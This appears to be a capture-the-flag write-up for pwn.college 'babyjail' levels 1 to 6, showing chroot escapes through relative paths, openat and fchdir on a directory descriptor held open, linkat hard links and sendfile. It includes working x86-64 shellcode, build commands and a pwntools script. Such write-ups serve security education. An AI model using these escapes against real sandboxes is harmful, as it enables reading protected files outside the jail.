Sandboxing

You can find the full code for all challenges here.

level 1

This challenge will chroot into a jail in /tmp/jail-XXXXXX. You will be able to easily read a fake flag file inside this jail, not the real flag file outside of it. If you want the real flag, you must escape. The only thing you can do in this challenge is read out one single file, as specified by the first argument to the program (argv[1]).

Let's look at the source code.

assert(chroot(jail_path) == 0);

Notice that even though the jail has been set, the program did not change directory to / and put us in that jail.

That means we are effectively not in jail.

If we give it /flag as argv[1], it is interpreted as /tmp/jail/flag, which gives us the fake flag.

In order to get the real flag, we have to pass the relative address of the real /flag from /tmp/jail/.

$ /challenge/babyjail_level1 ../../flag 

The first .. escapes from the jail/ and second .. escapes from the /tmp/ directory.

level 2

You may open a specified file, as given by the first argument to the program (argv[1]). You may upload custom shellcode to do whatever you want.

We can use the shellcode that we wrote for Shellcode Injection.

.global _start
.intel_syntax noprefix

_start:
	# Open syscall
	lea rdi, [rip + flag]
	mov rsi, 0
	mov rdx, 0
	mov rax, 0x02
	syscall

	# Read syscall
	mov rdi, rax
	mov rsi, rsp
	mov rdx, 1000
	mov rax, 0x00
	syscall

	# Write syscall
	mov rdi, 1
	mov rax, 0x01
	syscall

	# Exit syscall
	mov rdi, 0
	mov rax, 0x3c
	syscall

flag:
	.string "../../flag"

We can compile the program using gdb.

$ gcc -nostdlib ./shellcode.s -o ./shellcode

Let's extract the .text section using objcopy.

$ objcopy --dump-section .text=./shellcode.bin ./shellcode

Now we can send this code as STDIN.

$ /challenge/babyjail_level2 / < shellcode.bin

Note that we are in the hacker directory.

The shellcraft module from pwn allows us to create a shellcode easily. You could also use this method.

from pwn import *

elf = ELF("/challenge/babyjail_level2")

context.arch="amd64"

shellcode = asm(shellcraft.readfile("flag", 1))

p = process(["/challenge/babyjail_level2", "/"], cwd="/")
p.sendline(shellcode)
p.interactive()

However creating our own shellcode allows us to have more control over it.

level 3

You may open a specified file, as given by the first argument to the program (argv[1]). You may upload custom shellcode to do whatever you want.

On examining the code for this level, we can see that this time we have been put into the jail.

assert(chroot(jail_path) == 0);

puts("Moving the current working directory into the jail.\n");
assert(chdir("/") == 0);

That means we cannot just ../../flag our way to getting the flag.

Fortunately, there is openat syscall in linux which takes as input a directory file descriptor and then the path of the file to be opened relative to the directory.

int openat(int dirfd, const char pathname, int flags, mode_t mode);

In our case, the dirfd will be 3, the first three being STDIN, STDERR and STDOUT.

The openat syscall would look something like this:

# Openat syscall
mov rdi, 3
lea rsi, [rip + flag]
mov rdx, 0
mov r10, 0
mov rax, 0x101
syscall

flag:
.string "flag"

Note that I specified flag and not /flag because that would reference the file inside jail/.

The result of the openat syscall is a file descriptor.

We can check it's value in the practice mode using strace which traces every system call.

$ sudo strace /challenge/babyjail_level3 / < /home/hacker/shellcode.bin

---snip---;
openat(3, "flag", O_RDONLY)             = 4
read(4, "pwn.college{practice}\n", 1000) = 22
---snip---;

This result is stored in $rax as is the case with most syscall that return a value.

# Read syscall
mov rdi, rax
mov rsi, rsp
mov rdx, 1000
mov rax, 0x00
syscall

We can pass this shellcode to the challenge.

~$ /challenge/babyjail_level3 / < /home/hacker/shellcode.bin

Note that / is our argv[1], which we are using as reference in openat.

Since this directory is opened before chroot() is executed it won't be in the jail.

level 4

Escape a chroot sandbox using shellcode, but this time only using the following syscalls: "openat", "read", "write", "sendfile".

We could very well use the previous level's code but let's try something new.

The sendfile command is a combination of the read and write system calls. It's also more efficient as it does not require data to be transferred to and from user space.

It takes the following arguments:

ssize_t sendfile(int out_fd, int in_fd, off_t *_offset, size_t _count);

In our case the out_fd will be 1 for STDOUT.

# Sendfile syscall
mov rdi, 1
mov rsi, rax
mov rdx, 0
mov r10, 1000
mov rax, 0x28
syscall

Replace the read and write syscalls with the above code.

level 5

Escape a chroot sandbox using shellcode, but this time only using the following syscalls: "linkat", "open", "read", "write", "sendfile"

We can no longer use openat, but now we are allowed to use linkat.

It takes five arguments.

int linkat(int olddirfd, const char *oldpath, int newdirfd, const char *newpath, int flags);

Using linkat we can create a hard link in /tmp/jail/ that points to the /flag file in root / directory.

A hard link is an entry that associate a name with a file.

This allows us to access /flag inside of /tmp/jail/ using a different name.

Note that linkat returns a value of 0 on success.

# Linkat syscall
mov rdi, 3
lea rsi, [rip + old_path]
mov rdx, 4
lea r10, [rip + new_path]
mov r8, 0
mov rax, 0x109
syscall

old_path: 
.string "flag"

new_path: 
.string "/flag2.txt"

Now we can access /flag using /flag2.txt.

level 6

Escape a chroot sandbox using shellcode, but this time only using the following syscalls: "fchdir", "open", "read", "write", "sendfile".

The fchdir syscall works similar to chdir, the only difference is that it takes a file descriptor as argument.

int fchdir(int fd);

So we can effectively just jump out of the jail/.

# Fchdir syscall
mov rdi, 3
mov rax, 0x51
syscall

level 7